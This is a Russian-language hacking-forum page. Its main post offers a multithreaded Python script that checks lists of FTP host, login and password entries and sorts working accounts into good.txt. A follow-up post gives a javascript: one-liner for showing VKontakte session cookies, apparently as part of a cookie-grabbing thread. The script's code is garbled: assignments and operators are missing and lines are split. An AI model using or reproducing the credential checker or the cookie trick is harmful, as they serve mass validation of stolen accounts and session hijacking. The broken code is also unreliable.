Простейший многопоточный чекер ftp [python]
автор: rushter
сайт автора

Простейший чекер, ftp акки кидать в ftp.txt вида ftp.narod.ru:21|user|password. Порт указывать обязательно. В начале скрипта можно установить количество потоков, разделитель и таймаут. Если при подключении к ftp возникает ошибка, то аккаунт попадает в bad.txt, иначе в good.Ошибками может служить: таймаут подключения, неправильный логин и т.д.

PHP код:
# -*- coding: UTF-8 -*-
from ftplib import FTP
import Queue
import threading
import urllib
import time
queue 
Queue.Queue()
lock threading.RLock()
threads_count 10
separator 
"|"
timeout 3
def worker
():
    global 
queue
    
while True:
        try:
            
target =  queue.get_nowait()
        
except Queue.Empty:
            return 
        
check(target)
def write(data,s):
    
lock.acquire()
    if 
s:
        
put open("good.txt","a")
    
elif not s:
        
put open("bad.txt","a")
    
put.write(data+"\n")
    
put.close()
    
lock.release()
def check(qq):
    
qq qq.strip("\r\n").split(separator)
    
host qq[0]
    
host,port urllib.splitport(host)
    
ftp FTP()
    try:
        
ftp.connect(hostporttimeout)
        
ftp.login(qq[1],qq[2])
        
write("|".join(qq),True)
        
ftp.close()
    
except:
        
write("|".join(qq),False)
def main():
    print 
"Check started"
    
file open("ftp.txt").readlines()
    for 
f in file:
        
queue.put(f)
    for 
_ in xrange(threads_count):
        
thread_ threading.Thread(target=worker)
        
thread_.start()
        while 
threading.active_count() >1:
            
time.sleep(1)
    print 
"DONE"
main() 

Последний раз редактировалось NTR; 09.03.2010 в 22:27.
NTR вне форума   Ответить с цитированием
Старый 14.03.2010, 16:25   #18 (permalink)
Proxy-Base.Org Team
 
Регистрация: 19.05.2009
Сообщений: 960
Member ID: 147

Репутация: 2374
Репутация: 2374
Сказал(а) спасибо: 894
Поблагодарили 2,054 раз(а) в 713 сообщениях
Топикстартер (автор темы) По умолчанию Re: Полезные скрипты [Perl],[PHP],[Python]

Дополню 3nt3r, для получения cookies заходим в контакт и в адресной сроке вводим:
PHP код:
javascript:document.write(document.cookie); 
hide вне форума   Ответить с цитированием
Пользователь сказал cпасибо:
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[PERL] Multithread Mail.ru bruteforce by Sharky hide E-mail 4 25.02.2011 18:51
Начинаем программировать на C++, C#, ассемблере(win), Qt, Python, Java, AS3. Xsena Программирование 17 03.07.2010 16:36
PHP-NMAP po1nt SOFT (Варезник) 0 30.06.2009 12:11




DDoS Protected




Мы в твиттере, Proxy-Base.Org Twitter

Proxy-Base Community - Анонимность и безопасность в интернете.
Наши партнеры: CRC Labs, SEO-Crack.Com, Garsuk.Com, SED Team, Skladchik.com, BSS Family

Powered by vBulletin® | Булка сделана в пекарне®
Copyright © 2000 - , Jelsoft Enterprises Ltd. Перевод: zCarot
Вся информация на сайте выложена исключительно в ознакомительных целях.